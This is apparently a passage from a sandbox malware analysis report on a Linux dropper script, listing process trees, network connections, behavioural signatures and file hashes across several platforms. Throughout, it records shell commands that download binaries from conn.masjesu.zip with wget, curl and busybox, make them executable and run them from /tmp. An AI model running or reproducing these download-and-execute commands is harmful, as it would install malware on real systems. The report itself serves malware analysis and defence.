[./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/bin/rm
[rm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/bin/chmod
[chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
[./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/bin/rm
[rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/bin/chmod
[chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
[./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/bin/rm
[rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/bin/chmod
[chmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
[./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/bin/rm
[rm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/bin/chmod
[chmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
[./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/bin/rm
[rm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/chmod
[chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
[./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/rm
[rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/chmod
[chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
[./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/rm
[rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/chmod
[chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
[./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/rm
[rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/bin/chmod
[chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
[./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/bin/rm
[rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/bin/chmod
[chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
[./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/bin/rm
[rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:06
Reported
2024-10-18 02:08
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 89.187.167.39:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:06
Reported
2024-10-18 02:08
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 02:06
Reported
2024-10-18 02:08
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
31s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | N/A |
| N/A | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | N/A |
| N/A | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | /usr/bin/curl | N/A |
Processes
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/chmod
[chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
[./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/rm
[rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/chmod
[chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
[./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/rm
[rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/chmod
[chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
[./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/rm
[rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |